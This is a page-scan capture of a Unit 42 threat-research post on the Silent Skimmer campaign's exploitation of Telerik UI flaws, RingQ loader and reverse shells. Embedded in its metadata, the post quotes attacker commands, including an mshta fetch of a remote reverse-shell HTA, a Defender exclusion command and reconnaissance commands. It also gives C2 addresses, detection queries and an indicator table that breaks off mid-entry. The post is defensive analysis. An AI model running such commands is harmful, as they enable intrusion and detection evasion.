https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/

Scan ID:: c0eaa474-c743-4949-b842-51b3bd3f0ae2Finished
Submitted URL:: https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaignRedirected
Report Finished:: Nov 9, 2024, 01:45:56
Links · 133 found

The outgoing links identified from the page
Link	Text
https://www.paloaltonetworks.com/
https://www.paloaltonetworks.com/unit42	paloaltonetworks
https://start.paloaltonetworks.com/contact-unit42.html	Unit 42 Incident Response team
https://www.paloaltonetworks.com/unit42/about	About Unit 42About Unit 42
https://www.paloaltonetworks.com/unit42/assess	Proactive Assessments
https://www.paloaltonetworks.com/unit42/assess/ai-security-assessment	AI Security Assessment
https://www.paloaltonetworks.com/unit42/assess/attack-surface-assessment	Attack Surface Assessment
https://www.paloaltonetworks.com/unit42/assess/breach-readiness-review	Breach Readiness Review
https://www.paloaltonetworks.com/unit42/assess/business-email-compromise	BEC Readiness Assessment
https://www.paloaltonetworks.com/unit42/assess/cloud-security-assessment	Cloud Security Assessment
JavaScript Variables · 150 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope
Name	Type
0	object
onbeforetoggle	object
documentPictureInPicture	object
onscrollend	object
main_site_url	string
maindomain_lang	string
getParameterByName	function
container_q	object
d_lang	string
globalConfig	object
Console log messages · 5 found

Messages logged to the web console
Type	Category	Log
log	other	URL https://unit42.paloaltonetworks.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 Text JQMIGRATE: Migrate is installed, version 3.4.1
warning	other	URL https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTopBase.min.js Text cannot initialize nav because PAN_RunOnPageModelLoad is undefined
log	other	URL https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/defered.min.js Text navType: unit
warning	other	URL https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTopProductNav.min.js Text cannot initialize nav because PAN_RunOnPageModelLoad is undefined
error	network	URL https://unit42.paloaltonetworks.com/etc/clientlibs/clean/imgs/arrow-right-black.svg Text Failed to load resource: the server responded with a status of 404 (Not Found)
HTML

The raw HTML body of the page
<!DOCTYPE html><html lang="en-US"><head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
    <link rel="preconnect" href="https://www.paloaltonetworks.com">
    <link rel="preconnect" href="https://cdn.cookielaw.org">
    <link rel="preconnect" href="https://fonts.googleapis.com">
	    <!--  Start: Scripts Migrated From Unit42-v5 -->
<script type="text/javascript">
var main_site_url = 'https://www.paloaltonetworks.com';
var maindomain_lang = 'https://www.paloaltonetworks.com';
function getParameterByName(name, url) {
		if(url == null){
		  url = window.location.href;
		}
	    name = name.replace(/[\[\]]/g, '\\$&');
	    var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
		results = regex.exec(url);
	    if (!results) return null;
	    if (!results[2]) return '';
	    return decodeURIComponent(results[2].replace(/\+/g, ' '));
	}
	var container_q = getParameterByName('container');
	var d_lang = 'en';	
	if(container_q != '' && container_q != null){	    
	    sessionStorage.setItem('container',container_q);
	    	    location.href = 'https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign';
	}
</script>

<link rel="stylesheet" href="https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTop.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTop.min.css"></noscript>
<link rel="stylesheet" href="https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTopProductNav.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTopProductNav.min.css"></noscript>
<link rel="stylesheet" href="https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/deferedProductNav.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/deferedProductNav.min.css"></noscript>
  <meta name="robots" content="index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1">
<link rel="alternate" hreflang="en" href="https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/">
<link rel="alternate" hreflang="x-default" href="https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/">

	<!-- This site is optimized with the Yoast SEO Premium plugin v23.7 (Yoast SEO v23.7) - https://yoast.com/wordpress/plugins/seo/ -->
	<title>Silent Skimmer Gets Loud (Again)</title>
	<meta name="description" content="We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of Telerik UI vulnerabilities and malware like RingQ loader. We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of Telerik UI vulnerabilities and malware like RingQ loader.">
	<link rel="canonical" href="https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/">
	<meta property="og:locale" content="en_US">
	<meta property="og:type" content="article">
	<meta property="og:title" content="Silent Skimmer Gets Loud (Again)">
	<meta property="og:description" content="We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of Telerik UI vulnerabilities and malware like RingQ loader. We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of Telerik UI vulnerabilities and malware like RingQ loader.">
	<meta property="og:url" content="https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/">
	<meta property="og:site_name" content="Unit 42">
	<meta property="article:published_time" content="2024-11-07T11:00:13+00:00">
	<meta property="article:modified_time" content="2024-11-06T19:30:17+00:00">
	<meta property="og:image" content="https://unit42.paloaltonetworks.com/wp-content/uploads/2024/11/11_Cybercrime_Category_1920x900.jpg">
	<meta property="og:image:width" content="1920">
	<meta property="og:image:height" content="900">
	<meta property="og:image:type" content="image/jpeg">
	<meta name="author" content="Veronika Senderovych, Chema Garcia, Zack Fink">
	<meta name="twitter:card" content="summary_large_image">
	<!-- / Yoast SEO Premium plugin. -->


<link rel="alternate" type="application/rss+xml" title="Unit 42 » Feed" href="https://unit42.paloaltonetworks.com/feed/">
<link rel="alternate" type="application/rss+xml" title="Unit 42 » Comments Feed" href="https://unit42.paloaltonetworks.com/comments/feed/">
<link rel="alternate" type="application/rss+xml" title="Unit 42 » Silent Skimmer Gets Loud (Again) Comments Feed" href="https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/feed/">
<script type="text/javascript">
var globalConfig = {};
var webData = {};
webData.channel = "unit42";
webData.property = "unit42.paloaltonetworks.com";
webData.language = "en_us";
webData.pageType = "blogs";
webData.pageName = "unit42:silent-skimmer-latest-campaign";
webData.pageURL = "https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign";
webData.article_title = "Silent Skimmer Gets Loud (Again)";
webData.author = "Veronika Senderovych,Chema Garcia,Zack Fink";
webData.published_time = "2024-11-07T03:00:13-08:00";
webData.description = "%%excerpt%% We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of Telerik UI vulnerabilities and malware like RingQ loader.";
webData.keywords = "Cybercrime,Threat Actor Groups,Threat Research,C++,CL-CRI-0941,CVE-2017-11317,CVE-2019-18935,GodPotato,Python,Remote Code Execution,reverse shells,RingQ loader,Silent Skimmer,Telerik UI";
webData.resourceAssetID = "f607385639afae11d4ddc9fc9650192d";
</script>
<script type="text/javascript">
var globalConfig = {};
globalConfig.buildName = "UniqueResourceAssetsID_DEC022022";
</script>
<meta property="og:likes" content="0">
<meta property="og:readtime" content="11">
<meta property="og:views" content="2,072">
<meta property="og:date_created" content="November 7, 2024 at 3:00 AM">
<meta property="og:post_length" content="3227">
<meta property="og:category" content="Cybercrime">
<meta property="og:category" content="Threat Actor Groups">
<meta property="og:category" content="Threat Research">
<meta property="og:category_link" content="https://unit42.paloaltonetworks.com/category/cybercrime/">
<meta property="og:category_link" content="https://unit42.paloaltonetworks.com/category/threat-actor-groups/">
<meta property="og:category_link" content="https://unit42.paloaltonetworks.com/category/threat-research/">
<meta property="og:author" content="Veronika Senderovych">
<meta property="og:author" content="Chema Garcia">
<meta property="og:author" content="Zack Fink">
<meta property="og:authorlink" content="https://unit42.paloaltonetworks.com/author/">
<meta property="og:authorlink" content="https://unit42.paloaltonetworks.com/author/">
<meta property="og:authorlink" content="https://unit42.paloaltonetworks.com/author/">
<meta property="og:author_image_link" content="https://unit42.paloaltonetworks.com/wp-content/uploads/2018/11/unit-news-meta.svg">
<meta property="og:author_image_link" content="https://unit42.paloaltonetworks.com/wp-content/uploads/2018/11/unit-news-meta.svg">
<meta property="og:author_image_link" content="https://unit42.paloaltonetworks.com/wp-content/uploads/2018/11/unit-news-meta.svg">
<meta name="post_tags" content="C++,CL-CRI-0941,CVE-2017-11317,CVE-2019-18935,GodPotato,Python,Remote Code Execution,reverse shells,RingQ loader,Silent Skimmer,Telerik UI">
<script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"BlogPosting","headline":"Silent Skimmer Gets Loud (Again)","name":"Silent Skimmer Gets Loud (Again)","description":"We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of Telerik UI vulnerabilities and malware like RingQ loader.","url":"https:\/\/unit42.paloaltonetworks.com\/silent-skimmer-latest-campaign\/","mainEntityOfPage":"https:\/\/unit42.paloaltonetworks.com\/silent-skimmer-latest-campaign\/","datePublished":"November 7, 2024","articleBody":"Executive Summary\r\nIn late May 2024, Unit 42 researchers observed an adversary compromising multiple web servers to gain access to the environment of a multinational organization headquartered in North America. Based on overlaps in adversary infrastructure and tools, as well as tactics, techniques and procedures (TTPs), it\u2019s possible to attribute the activity identified to the same threat actor behind the Silent Skimmer campaign.\r\n\r\nIn September 2023, an online payment scraping campaign was uncovered and dubbed Silent Skimmer. Since then, there has been little to no news of Silent Skimmer \u2013 until now.\r\n\r\nAccording to our research, the financially motivated threat actor behind the Silent Skimmer campaign is targeting organizations that host or create payment infrastructure and gateways. Unit 42 tracks the activity identified in this article as CL-CRI-0941.\r\n\r\nPalo Alto Networks customers are better protected from these threats through Cortex XDR and XSIAM, as well as Cloud-Delivered Security Services including Advanced URL Filtering, Advanced DNS Security, Advanced Threat Prevention and Advanced WildFire. Cortex Xpanse is able to identify internet-facing instances of Telerik UI. Organizations can engage the Unit 42 Incident Response team for specific assistance with this threat and others.\r\n\r\n\r\n\r\nRelated Unit 42 Topics\r\nRemote Code Execution (RCE)\r\n\r\n\r\n\r\nObserved Activities and TTPs\r\nIn May 2024, Unit 42 researchers investigated an incident where attackers compromised multiple web servers to gain access to their environment and dump payment information. The threat actor gained an initial foothold on the servers by exploiting a couple of one-day Telerik user interface (UI) vulnerabilities.\r\n\r\nTelerik UI is a popular framework for developing the user interface of ASP.NET web applications. The threat actor attempted to exploit two Telerik UI vulnerabilities to gain initial access to the environment:\r\n\r\n \tCVE-2017-11317 \u2014 Unrestricted file upload via weak encryption\r\n \tCVE-2019-18935 \u2014 Remote code execution via insecure deserialization\r\n\r\nAdversaries commonly exploit both of these vulnerabilities. They are a part of CISA\u2019s Known Exploited Vulnerabilities Catalog.\r\n\r\nThe vulnerabilities allow for remote code execution on servers running older, vulnerable versions of Telerik UI. We recommend upgrading to the latest available version.\r\n\r\nFollowing the vulnerabilities' exploitation, the attacker executed multiple reconnaissance commands and gained persistence. The following commands were among those executed:\r\n\r\n \tset\r\n \twhoami\r\n \tquser\r\n \tnet user\r\n \tdir\r\n \ttasklist \/svc\r\n \tipconfig\r\n \tnetstat -ano | findstr \\\"443\\\"\r\n \tnet localgroup administrators\r\n \tdir c:\\users\\public\r\n \t\"C:\\Windows\\system32\\ARP.EXE\" -a\r\n \t\"C:\\Windows\\system32\\systeminfo.exe\"\r\n \t\"C:\\Windows\\system32\\reg.exe\" query \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\" \/s\r\n \tcmd \/c hostname\r\n\r\nThe threat actor leveraged several techniques to achieve a foothold and execution onto the servers and environment.\r\n\r\nThe attacker uploaded multiple web shells, mainly to the following directories:\r\n\r\n \tC:\\Users\\Public\\Music\\\r\n \tC:\\WebRoot\\Health Checks\\Default\\\r\n \tC:\\WebRoot\\Web Applications\\*\\*\\Images\\Common\\\r\n \tC:\\WebRoot\\IIS\\Web Applications\\*\\*\\Images\\Common\\\r\n \tC:\\WebRoot\\IIS\\Web Applications\\Production\\*\\*\\Images\\Common\\\r\n\r\nThe attacker also dropped and executed multiple reverse shells, as we describe later in the Reverse Shells section. These reverse shells were responsible for the rest of the executions we describe in this article.\r\n\r\nWe also observed that the threat actor used tunneling and reverse proxy tools such as Fuso and FRP. These allowed the attacker to expose the exploited servers located behind a network address translation (NAT) or firewall to the internet.\r\n\r\nWe observed the following reverse proxy executions:\r\n\r\n\r\n\r\nWe observed the attacker using GodPotato for privilege escalation. GodPotato executed using a Base64-encoded PowerShell command that translated to the command shown in Figure 1 below.\r\n\r\n[caption id=\"attachment_137326\" align=\"alignnone\" width=\"900\"] Figure 1. GodPotato download and execution.[\/caption]\r\n\r\nThe attacker retrieved other GodPotato payloads from http:\/\/48[.]218.138.60\/a.txt and http:\/\/48[.]218.138[.]60\/m.txt. They used these to execute powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath D:\\ to add D:\\ to the Windows Defender exclusion list to evade detection.\r\nNative C++ Code Embedded within .NET Binaries\r\nTo bypass the security measures and make the analysis process more difficult, the threat actor used .NET binaries with native C++ code embedded by leveraging mixed mode assemblies. The threat actor used this as a way to include code from one programming language embedded in another, which is an old technique some programming languages natively support.\r\n\r\nIn this case, mixed-mode assemblies were used to embed native C++ code within a .NET binary. As a result, some .NET binary analysis tools are unable to analyze the embedded (unmanaged) code. This requires researchers to put in extra effort to identify the malicious payload. In 2022, Mandiant [PDF] used a sample employing this technique in their annual FLARE-On Challenge.\r\n\r\nThe threat actor used this feature to create .NET wrapper binaries to execute malicious code. So when analyzing the binaries with .NET analysis tools like dnSpy for instance, there is no code to be executed as shown in Figure 2.\r\n\r\n[caption id=\"attachment_137328\" align=\"alignnone\" width=\"400\"] Figure 2. Empty .NET code.[\/caption]\r\n\r\nAlthough this is not always the case, Figure 3 shows how dnSpy can identify the usage of mixed mode assemblies and warns about the unmanaged code, also showing the native entry point.\r\n\r\n[caption id=\"attachment_137330\" align=\"alignnone\" width=\"550\"] Figure 3. dnSpy warning on the usage of unmanaged code.[\/caption]\r\n\r\nWhen jumping to the native entry point address, it is possible to identify the native code as shown in Figures 4 and 5.\r\n\r\n[caption id=\"attachment_137332\" align=\"alignnone\" width=\"900\"] Figure 4. Native entry point content.[\/caption]\r\n\r\n[caption id=\"attachment_137334\" align=\"alignnone\" width=\"600\"] Figure 5. Native code calling the function written by the threat actor.[\/caption]\r\n\r\nBy following the execution flow, it is possible to reach the malicious command executed, as identified in Figure 6. The malicious command uses Microsoft HTML Application Host (MSHTA) Living Off the Land Binaries (LOLBin) to download and execute a remote HTA (HTML Application) payload. It then proxies the execution of the malicious code through a legitimate and official binary.\r\n\r\n[caption id=\"attachment_137336\" align=\"alignnone\" width=\"900\"] Figure 6. Embedded native code executing the malicious command.[\/caption]\r\nRingQ Loader\r\nDuring the investigation, Unit 42 researchers observed the threat actor leveraging the RingQ loader as part of their arsenal. The RingQ loader comprises two main components. One is a tool that creates an encrypted file containing the binary to be loaded and executed, and the other is the loader itself, which reflectively loads the binary.\r\n\r\nRingQ can also act as a downloader if configured to do so. Figure 7 shows the logic of the loader and the execution branches to load the encrypted file locally or remotely from a URL specified in the binary resources.\r\n\r\n[caption id=\"attachment_137338\" align=\"alignnone\" width=\"602\"] Figure 7. Execution logic source code from the GitHub repository.[\/caption]\r\n\r\nThe samples identified in the activity covered in this article use different methods to load the encrypted payload. Figure 8 shows the value set to the Portable Executable (PE) string table resource of the RingQ loader to download the encrypted payload from a remote URL.\r\n\r\n[caption id=\"attachment_137340\" align=\"alignnone\" width=\"364\"] Figure 8. Remote location of the encrypted payload using the RingQ author nickname as the filename.[\/caption]\r\n\r\nThe GitHub repository of the RingQ loader also includes a tool (QVM250) to tweak the resources of the PE file and include resources from original binaries in an attempt to trick and bypass some security measures. In the activity identified, one of the samples was mimicking PuTTY, a common SSH client for MS Windows (Figure 9).\r\n\r\n[caption id=\"attachment_137342\" align=\"alignnone\" width=\"900\"] Figure 9. Fake resources included in the loader.[\/caption]\r\nCompiled Python - Dumping Payment Information\r\nAfter the adversary secured web shell access on the server, they wrote a Windows executable to disk with a .txt file extension. Based on strings in the binary, we could determine that it was a Python script compiled to an executable with PyInstaller (Figure 10).\r\n\r\n[caption id=\"attachment_137344\" align=\"alignnone\" width=\"900\"] Figure 10. PyInstaller compilation strings.[\/caption]\r\n\r\nUsing a tool like PyInstaller Extractor, we could reverse that process and extract the compiled Python bytecode. The bytecode is readable but harder to understand. By using a tool like uncompyle6, we reverted the Python bytecode to its original Python form.\r\n\r\nThe nearly 8 MB original executable boils down to a simple Python script, shown below in Figure 11. The rest of the files were artifacts of PyInstaller that allow for proper packaging and execution. The script itself is simple and uses hard-coded credentials to connect to a database in the victim\u2019s organization and dump payment information to a .csv file.\r\n\r\n[caption id=\"attachment_137346\" align=\"alignnone\" width=\"500\"] Figure 11. Python script for executable.[\/caption]\r\nReverse Shells\r\nOnce the threat actor gained a foothold on the servers by exploiting the Telerik vulnerabilities, they attempted to achieve persistence by dropping multiple web shells as well as multiple PowerShell reverse shells.\r\n\r\nDuring our investigation, we observed that the threat actor installed reverse shells by executing multiple MSHTA commands that retrieved an .hta script from a hard-coded IP address, such as the following:\r\n\r\n \tmshta http:\/\/172[.]86.96.245\/129-80.hta (the .hta file script shown in Figure 12)\r\n\r\n[caption id=\"attachment_137348\" align=\"alignnone\" width=\"900\"] Figure 12. 129-80.hta script content.[\/caption]\r\n\r\nWe observed these executions with multiple different IP addresses and file names. The IP address in the URL was also used as the command and control (C2) IP address for the reverse shell. The filename represented the port in most cases, which is shown in the first two lines in Figure 12. The .hta file shown in Figure 13 is a VBScript that executes a Base64-encoded PowerShell command that decodes to a PowerShell script.\r\n\r\n[caption id=\"attachment_137350\" align=\"alignnone\" width=\"900\"] Figure 13. The reverse shellcode.[\/caption]\r\n\r\nThe reverse shells were also installed by downloading a .ps1 script, which is the reverse shell, using PowerShell's Invoke-WebRequest utility and executing it (Figure 14).\r\n\r\n[caption id=\"attachment_137352\" align=\"alignnone\" width=\"900\"] Figure 14. PowerShell executes Invoke-WebRequest utility.[\/caption]\r\nAttribution and Overlaps\r\nOne of the Cobalt Strike C2 IP addresses identified in this activity matches an IP address mentioned in a Sophos X-Ops report, where a similar infection chain resulted in an Ambitious Scorpius (BlackCat) ransomware attack. Since Ambitious Scorpius stopped operations after performing an exit scam, this overlap may belong to an affiliate or a cybercrime cluster used across both attacks.\r\n\r\nThe BlackBerry Research and Intelligence Team first wrote about the Silent Skimmer campaign back in September 2023. LevelBlue Labs later published their own findings. Since then, we haven't heard much about the campaign.\r\n\r\nA significant number of the TTPs we observed in our investigation align with the ones described in BlackBerry's blog starting from the initial access vector, which is the exploitation of publicly facing web servers. Specifically, both campaigns involved the exploitation of Telerik UI vulnerabilities that are over 5 years old.\r\n\r\nFollowing initial access, there were mostly identical techniques of installing reverse shells by executing mshta.exe, which downloads and executes an .hta script. While in BlackBerry's incident, the .hta file is a VBScript that downloads and executes a .ps1 script using certutil.exe, which is the reverse shell. In the incident Unit 42 was involved in, the .hta file is a VBScript that executes a PowerShell encoded command that decodes to a PowerShell script, which is the final reverse shell.\r\n\r\nIn the incident we were involved in, the attackers used reverse proxy tools and web shells to maintain persistence and control over compromised systems. Additionally, they leveraged GodPotato (a privilege escalation tool) and deployed Cobalt Strike for post-exploitation activities. These findings align closely with the tactics detailed in the BlackBerry blog.\r\n\r\nThe main difference between the campaigns is the method used to extract the payment and financial data. In the campaign described by BlackBerry, the attackers append malicious code to different payment-related pages that scrape the payment data. In the campaign we observed, the threat actor used a compiled Python script to connect to a database in the victim\u2019s organization and then dumped payment information to a CSV file for exfiltration.\r\n\r\nWith all this information, in alignment with the Unit 42 naming convention procedures, we are tracking this threat activity cluster as CL-CRI-0941.\r\nConclusion\r\nThe threat actor behind Silent Skimmer has resurfaced after a year, now leveraging a new technique for scraping payment details. Despite this update, the group's TTPs remain largely consistent with previous activity. This persistence underscores the need for organizations to stay vigilant and patch vulnerabilities promptly to defend against this enduring threat.\r\n\r\nPalo Alto Networks customers are better protected from the threats discussed in this article through the following products:\r\n\r\n \tCortex XDR and XSIAM help protect against the threats described through modules including Behavioral Threat Protection and Local Analysis.\r\n \tCloud-Delivered Security Services, including:\r\n\r\n \tThe Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.\r\n \tAdvanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with CL-CRI-0941 activity as malicious.\r\n \tAdvanced Threat Prevention signatures exist for activity described in this article, including the CVEs mentioned.\r\n\r\n\r\n\r\nCortex Xpanse is able to identify internet-facing instances of Telerik UI, including versions that are specifically associated with the vulnerabilities above.\r\n\r\nIf you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:\r\n\r\n \tNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\n \tEMEA: +31.20.299.3130\r\n \tAPAC: +65.6983.8730\r\n \tJapan: +81.50.1790.0200\r\n\r\nPalo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.\r\n\r\nXQL Queries\r\n\/\/ Description: mshta.exe executing a powershell encoded command\r\n\r\nconfig case_sensitive = false\r\n\r\n| dataset = xdr_data\r\n\r\n| filter event_type = ENUM.PROCESS and event_sub_type = ENUM.PROCESS_START\r\n\r\n| filter actor_process_image_name = \"mshta.exe\"\r\n\r\n\/\/ Filtering powershell with base64 encoded commands\r\n\r\n| filter action_process_image_name = \"powershell.exe\" and action_process_image_command_line ~= \"[A-Za-z0-9+\\\/]{50,}[=]{0,2}\"\r\n\r\n\/\/ Decoding the base64 encoded commands\r\n\r\n| alter decoded_base64 = convert_from_base_64(arrayindex(regextract(action_process_image_command_line, \"[A-Za-z0-9+\\\/]{50,}[=]{0,2}\"),0))\r\n\r\n| alter decoded_base64 = replex(decoded_base64, \"\\x00\", \"\") \/\/ Trick to remove null bytes in decoded base64 output\r\n\r\n| fields _time, agent_hostname, agent_ip_addresses, action_process_image_name, action_process_image_command_line, actor_process_command_line, causality_actor_process_command_line, decoded_base64\r\n\/\/ Description: MSHTA command line\r\n\r\nconfig case_sensitive = false\r\n\r\n| dataset = xdr_data\r\n\r\n| filter event_type = ENUM.PROCESS and event_sub_type = ENUM.PROCESS_START\r\n\r\n| filter action_process_image_name = \"mshta.exe\" and action_process_image_command_line ~= \"http:\/\/(?:(?:\\d|[01]?\\d\\d|2[0-4]\\d|25[0-5])\\.){3}(?:25[0-5]|2[0-4]\\d|[01]?\\d\\d|\\d)\/(?:\\d{2,3}|\\d{1,3}-\\d{2,3}|securityhealth|securityhealthsystray|shell|\\w+).hta\"\r\n\r\n| fields _time, agent_hostname, agent_ip_addresses, action_process_image_name, action_process_image_command_line, actor_process_command_line, causality_actor_process_command_line\r\n\/\/Description: Looks for IIS processes dropping DLLs with a naming convention used in a public CVE-2019-18935 POC and in the current incident\r\n\r\ndataset = xdr_data\r\n\r\n|filter event_type = ENUM.FILE\r\n\r\n|filter actor_process_image_name = \"w3wp.exe\"\r\n\r\n|filter action_file_name ~= \"^[0-9]{10}\\.[0-9]{5,7}(?:\\.dll|sleep\\-[0-9]{10}-amd64)\"\r\n\r\n|fields _time, agent_hostname, actor_process_image_name, actor_process_command_line, action_file_path, action_file_sha256\r\nIndicators of Compromise\r\n\r\n\r\n\r\nValue\r\nType\r\nDescription\r\n\r\n\r\n55271d94eb3c95bb6a1965d44bade5ecef5ff610e87133f169e602eb94c39d6b\r\nSHA256\r\nRingQ Loader\r\n\r\n\r\n1b325d32bc99db4b16e2cc4d4810c195f3643936d7ff5baee43ddd18cae9b2a6\r\nSHA256\r\nRingQ Loader\r\n\r\n\r\n85d67f9f6f82de5a8f5f92fcf9a82bbed2ff6f6d91a06a058a40c5a64882149b\r\nSHA256\r\nRingQ Loader\r\n\r\n\r\nb44e6fd83b87d50c8aa8cf62de2578a13c22292fcf298b7664ed828804280dbe\r\nSHA256\r\nRingQ Loader\r\n\r\n\r\ne3746de8993069f343a7334046a2361318e213e13883513a7c0713a847fd4dc9\r\nSHA256\r\nRingQ Loader\r\n\r\n\r\n64ae2bf6920311be2521c47678c04299bd24c2caec2df5b340aa212a69760fda\r\nSHA256\r\nRingQ Loader\r\n\r\n\r\n12508b830149c2d84f2c80947e78218128d16a834c8d0695068f3e773ac62ef9\r\nSHA256\r\nGodPotato\r\n\r\n\r\n0aa0ca465170315d2f02c471d5d96ce5fbd6076f59be83fa5398968e951a5f51\r\nSHA256\r\nGodPotato\r\n\r\n\r\ndc53581d4c9140b0f987eb6686d67db6d777f8c89114b062be35b8f2847aa66f\r\nSHA256\r\nUsage of mixed mode assemblies\r\n\r\n\r\n3579bae222eb8d7a7c3c16598cf9e81aecbbfc1a2ac2168430e48acfb02cfb24\r\nSHA256\r\nUsage of mixed mode assemblies\r\n\r\n\r\n5d82f31bc37aa18e5c5110968b1a85aa419c6e2840e17074d2519ed9ad5b914c\r\nSHA256\r\nUsage of mixed mode assemblies\r\n\r\n\r\n5ef5c841f74f9331efb5a43cd16d62fd27eb8293888e872a17c7a57795e37d75\r\nSHA256\r\nUsage of mixed mode assemblies\r\n\r\n\r\n7dadff4d883b32c01bbcb96baf081649dbfadd186b934a7fd3c9754e0ba87ab3\r\nSHA256\r\nUsage of mixed mode assemblies\r\n\r\n\r\n8ae2b420245ebbd983d42bb2d8ceb92f2e7ef40181d8f1cb347797ee7a61b2a1\r\nSHA256\r\nUsage of mixed mode assemblies\r\n\r\n\r\nc0244fafbd5231730fdd0bfef2a972dd074f52ca46dc377494424269add81d2b\r\nSHA256\r\nUsage of mixed mode assemblies\r\n\r\n\r\nc73e3b300ac9eb956a471cefb2282602834b5809c46b7807cfc06f671a5d9f8f\r\nSHA256\r\nUsage of mixed mode assemblies\r\n\r\n\r\nf9e5e09788.ipv6.1433.eu.org\r\nDomain\u00a0\r\nConnectivity checks\r\n\r\n\r\nhttp:\/\/20.222.194[.]41\/SecurityHealthSystray.hta\r\nURL\r\nMSHTA payload\r\n\r\n\r\nhttp:\/\/20.210.230.146\/SecurityHealthSystray.hta\r\nURL\r\nMSHTA payload\r\n\r\n\r\nhttp:\/\/13.78.113[.]103\/One.ps1\r\nURL\r\nPowerShell payload\r\n\r\n\r\nhttp:\/\/13.71.153[.]8\/logtest.ps1\r\nURL\r\nPowerShell payload\r\n\r\n\r\nnigntboxcdn[.]com\r\nFQDN\r\nExfiltration\r\n\r\n\r\n342daa41ba3989d5ecb95c7c19a55c1a00c12b6c2faa2cac052bc910a6edd56f\r\nSHA256\r\nWeb shell\r\n\r\n\r\n28f0f37fcdee2ac2c022bb454b30f05458075434fa57662af2de22ba5cfb45c1\r\nSHA256\r\nWeb shell\r\n\r\n\r\n29a81d3125ab1c886266a03902204253708f8d181c547a88ceb447ef59f99f60\r\nSHA256\r\nWeb shell\r\n\r\n\r\n9b29964d0b3d026aa01713dbdf4361439788c05c8eb8723fc7cfb933245dec45\r\nSHA256\r\nWeb shell\r\n\r\n\r\n311935e115d678adbe502c8cc4e5396323f3f015ee186df6dc9f67ae0248104b\r\nSHA256\r\nWeb shell\r\n\r\n\r\n06710575d20cacd123f83eb82994879367e07f267e821873bf93f4db6312a97b\r\nSHA256\r\nWeb shell\r\n\r\n\r\n20[.]37.116.136\r\nIP address\r\nC2\r\n\r\n\r\n167[.]88.168.11\r\nIP address\r\nC2\r\n\r\n\r\n45[.]61.166.209\r\nIP address\r\nC2\r\n\r\n\r\n172[.]86.123.127\r\nIP address\r\nC2\r\n\r\n\r\n48[.]218.138.60\r\nIP address\r\nC2\r\n\r\n\r\n172[.]86.105.129\r\nIP address\r\nC2\r\n\r\n\r\n172[.]86.96.245\r\nIP address\r\nC2\r\n\r\n\r\n20[.]188.26.190\r\nIP address\r\nC2\r\n\r\n\r\n13[.]78.113.103\r\nIP address\r\nC2\r\n\r\n\r\n13[.]78.94.29\r\nIP address\r\nC2\r\n\r\n\r\n52[.]253.107.167\r\nIP address\r\nC2\r\n\r\n\r\n20[.]89.43.151\r\nIP address\r\nC2\r\n\r\n\r\n20[.]222.194.41\r\nIP address\r\nC2\r\n\r\n\r\n20[.]222.138.18\r\nIP address\r\nC2\r\n\r\n\r\n60[.]204.201.75\r\nIP address\r\nC2\r\n\r\n\r\n5acac9846035863b178ff75fb2a8bdcd53e5d496007d032c3fb20e0dc8306fd9\r\nSHA256\r\nShellcode runner\r\n\r\n\r\nb1d10328d0cbe3413d1ec15888e5772e323798072fda1285f17b61a96bf0e34e\r\nSHA256\r\nUnknown\r\n\r\n\r\n91a5f92908c561f1d1814d36da613c5b7411bb45554e1b2d19713f1f6d50a10c\r\nSHA256\r\nCobalt 